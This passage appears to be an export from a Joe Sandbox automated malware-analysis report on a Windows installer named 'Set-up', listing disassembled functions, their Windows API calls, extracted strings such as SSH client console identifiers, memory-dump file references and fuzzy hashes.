                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ExchangeInterlocked$CompareHandleModuleSwitchThread
                                                                                                                                  • String ID: CloseConsoleHandle$CompareStringOrdinal$DuplicateConsoleHandle$GetProcessId$InvalidateConsoleDIBits$OpenConsoleW$VerifyConsoleIoHandle$kernel32.dll
                                                                                                                                  • API String ID: 925111853-1511978065
                                                                                                                                  • Opcode ID: 8d30d9f6fb682db236c65effcec1568c21f41936fdbe0be076bad49bbc85932e
                                                                                                                                  • Instruction ID: 4b3b34f5292b9519471bf062a55f8743c70019eb2bd6ef8ef4c66fddc00bd3cc
                                                                                                                                  • Opcode Fuzzy Hash: 8d30d9f6fb682db236c65effcec1568c21f41936fdbe0be076bad49bbc85932e
                                                                                                                                  • Instruction Fuzzy Hash: 1A11E9746C1340AFD738CF21A849A6D3BB4FB49702F0015A9F825E234CC7B42A60CBE9
                                                                                                                                  Function 00E44D40 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 247synchronizationprocessCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00E44D5D
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 00E44D6D
                                                                                                                                  • ResetEvent.KERNEL32 ref: 00E44D93
                                                                                                                                  • CreateProcessW.KERNEL32(0131AB88,?,00000000,00000000,00000000,00000008,00000000,00000000,?,?,?,00000000,00000040), ref: 00E44FA6
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000040), ref: 00E44FB4
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000040), ref: 00E44FC0
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000040), ref: 00E44FCA
                                                                                                                                  • SetEvent.KERNEL32(?,00000000,00000040), ref: 00E44FE3
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00000000,00000040), ref: 00E44FF5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseEventHandleProcess$CreateCurrentReset
                                                                                                                                  • String ID: -as=0x$ -ep=0x$ -msg64=$ -pid=$ -tid=$=$BvDump -reason=$D
                                                                                                                                  • API String ID: 1887766995-2405390875
                                                                                                                                  • Opcode ID: 792768146afce5b9e73e4fe1df7805c9d90e1d4e0d0719fde72e3b90247d48d0
                                                                                                                                  • Instruction ID: 66de8fc0df99de46dff36d6375d3366a34a2c42f7fa01bb8a0413fd9d43650ab
                                                                                                                                  • Opcode Fuzzy Hash: 792768146afce5b9e73e4fe1df7805c9d90e1d4e0d0719fde72e3b90247d48d0
                                                                                                                                  • Instruction Fuzzy Hash: 7791BB716043419BD730DF28EC45BABB7E8FB98715F00492AFA99E72C4DB31A844CB91
                                                                                                                                  Function 00E4FCD0 Relevance: 28.7, APIs: 19, Instructions: 178COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE55
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE6C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE83
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FE9A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEB1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEC8
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEDF
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FEF6
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF0D
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF24
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF3B
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF52
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF69
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF80
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FF97
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FFAE
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4FFC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                  • Opcode ID: d20ba85b78abce5fe82bf71f7e5fdcae56ae7ca970d13f65e9b0d6ed9ceb6193
                                                                                                                                  • Instruction ID: b33799243aa951fb296ff16d1c43754934ff910a7e50a563927e746f269ca64d
                                                                                                                                  • Opcode Fuzzy Hash: d20ba85b78abce5fe82bf71f7e5fdcae56ae7ca970d13f65e9b0d6ed9ceb6193
                                                                                                                                  • Instruction Fuzzy Hash: D7514D75544345FEC608FB61E866F5EB7E8BF14F18F404C7DF089A3191EB71A9048A1A
                                                                                                                                  Function 00E5B920 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 228COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5BA29
                                                                                                                                  • FoldStringW.KERNEL32(000000B0,?,00000000,?,?,00000000), ref: 00E5BA5D
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5BA6B
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5BA99
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5BAFC
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5BB3F
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5BB4B
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E5BBDD
                                                                                                                                  • datavect<wchar_t>::size, xrefs: 00E5BBD8
                                                                                                                                  • value <= (InType) std::numeric_limits<OutType>::max(), xrefs: 00E5BA44
                                                                                                                                  • NormalizePassphrase: FoldString, xrefs: 00E5BA78
                                                                                                                                  • value >= 0, xrefs: 00E5BBC9
                                                                                                                                  • NormalizePassphrase: folded buffer too large, xrefs: 00E5BA00
                                                                                                                                  • NumCast, xrefs: 00E5BA3F, 00E5BBC4
                                                                                                                                  • NormalizePassphrase: UTF-8 buffer too large, xrefs: 00E5BAD3
                                                                                                                                  • NormalizePassphrase: WideCharToMultiByte, xrefs: 00E5BB59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$CurrentErrorLast$BreakByteCharConcurrency::cancel_current_taskDebugDebuggerFileFoldModuleMultiNamePresentProcessStringThreadWide
                                                                                                                                  • String ID: !af_$NormalizePassphrase: FoldString$NormalizePassphrase: UTF-8 buffer too large$NormalizePassphrase: WideCharToMultiByte$NormalizePassphrase: folded buffer too large$NumCast$datavect<wchar_t>::size$value <= (InType) std::numeric_limits<OutType>::max()$value >= 0
                                                                                                                                  • API String ID: 1701598438-1489170544
                                                                                                                                  • Opcode ID: a28846a8a78e3bc63fa6c4611c846d8c56ea09eec11a20327aff55a5da7fe5b3
                                                                                                                                  • Instruction ID: 2a3527d44f6ce37789b74d29bb39b9289e5503bbe493798cde742e3cc2a4091e
                                                                                                                                  • Opcode Fuzzy Hash: a28846a8a78e3bc63fa6c4611c846d8c56ea09eec11a20327aff55a5da7fe5b3
                                                                                                                                  • Instruction Fuzzy Hash: 2981D170A00348EFDB14EBA5DD46BAEBBF4AF04704F104558F915BB2D1DBB06A08CB92
                                                                                                                                  Function 00E84E90 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 206COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E84F3A
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00E8501A
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00E850C7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: An $Invalid type$Optional$Recommended$\red0\green160\blue0$\red10\green255\blue10$\red240\green0\blue0$\red240\green90\blue0$\red255\green20\blue20$\red255\green255\blue0$an $optional$recommended
                                                                                                                                  • API String ID: 3502205127-1911849566
                                                                                                                                  • Opcode ID: 446354bfa2803d1b3a25add16f4dce97ac19e7203103be0d2c367f68160988f4
                                                                                                                                  • Instruction ID: 2a1d31c2f3124b5cdf4d141c3a43d88edf33a69fe03a964141956cc0faffe38e
                                                                                                                                  • Opcode Fuzzy Hash: 446354bfa2803d1b3a25add16f4dce97ac19e7203103be0d2c367f68160988f4
                                                                                                                                  • Instruction Fuzzy Hash: 6E71D472B14A49ABDB21EF68D805BAEBBE4FB44718F04514EE40CB72C1DBB99904C7D1
                                                                                                                                  Function 00E610E2 Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 418keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E61377
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E613F8
                                                                                                                                    • Part of subcall function 00E5F2A0: EnterCriticalSection.KERNEL32(0131B8F8,?), ref: 00E5F35B
                                                                                                                                    • Part of subcall function 00E5F2A0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F3F8
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00E61111
                                                                                                                                    • Part of subcall function 00E5F2A0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5F2DF
                                                                                                                                    • Part of subcall function 00E5F2A0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F410
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E619D9
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E6188F, 00E618A3, 00E618B7
                                                                                                                                  • ncvector<struct SshClient::Console::OutParam>::begin, xrefs: 00E6188A
                                                                                                                                  • datavect<struct SshClient::Console::OutParam *>::size, xrefs: 00E6189E
                                                                                                                                  • BvConsole: Invalid completion action, xrefs: 00E618C3
                                                                                                                                  • ncvector<struct SshClient::Console::OutParam>::operator [], xrefs: 00E618B2
                                                                                                                                  • datavect<struct SshClient::Console::OutParam *>::at, xrefs: 00E61876
                                                                                                                                  • , xrefs: 00E61901
                                                                                                                                  • !af_ && i<s_, xrefs: 00E6187B
                                                                                                                                  • (, xrefs: 00E61454
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$State
                                                                                                                                  • String ID: $!af_$!af_ && i<s_$($BvConsole: Invalid completion action$datavect<struct SshClient::Console::OutParam *>::at$datavect<struct SshClient::Console::OutParam *>::size$ncvector<struct SshClient::Console::OutParam>::begin$ncvector<struct SshClient::Console::OutParam>::operator []
                                                                                                                                  • API String ID: 2483608690-741076853
                                                                                                                                  • Opcode ID: 4652cd12725b9d11375caedbd1d5303ec66a704406df08e5d3f98394c597243b
                                                                                                                                  • Instruction ID: f1919f45096fd07637a9f5a43488d1baca15be7195d6215b660f14776d246fac
                                                                                                                                  • Opcode Fuzzy Hash: 4652cd12725b9d11375caedbd1d5303ec66a704406df08e5d3f98394c597243b
                                                                                                                                  • Instruction Fuzzy Hash: 78F10670E40248DEDF29DFA4D895BEEBBF4AF15344F18509CE411B7282DB709A49CB61
                                                                                                                                  Function 00E86500 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 295COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ($($)$)$-$-$/$/$7$7$8$8$RefPtrConst<class VersionInfo>::GetRef$m_ptr != nullptr
                                                                                                                                  • API String ID: 0-2960953702
                                                                                                                                  • Opcode ID: 8a37ee2cb7ee7c4dfd3f52b8f698c44efd2b1cac147a67228e25c7c5da02470c
                                                                                                                                  • Instruction ID: 8f625bf4645aafc61afbee719c8be80aa06e79bd803993be4adb63bd794be324
                                                                                                                                  • Opcode Fuzzy Hash: 8a37ee2cb7ee7c4dfd3f52b8f698c44efd2b1cac147a67228e25c7c5da02470c
                                                                                                                                  • Instruction Fuzzy Hash: D0C17BB0900258AFDB25EF94C944B9EBBB8FF04708F504159E41DBB281DB75AA18CFA1
                                                                                                                                  Function 00E5DD10 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 238libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000107,?,?,460C02D8,00000000,00000000,00000038), ref: 00E5DDDC
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5DDEE
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DE1D
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E5DE53
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5DE64
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DE93
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,00000000,01068492,460C02D8,00000000,00000000,00000038), ref: 00E5DF44
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5DF66
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DF95
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
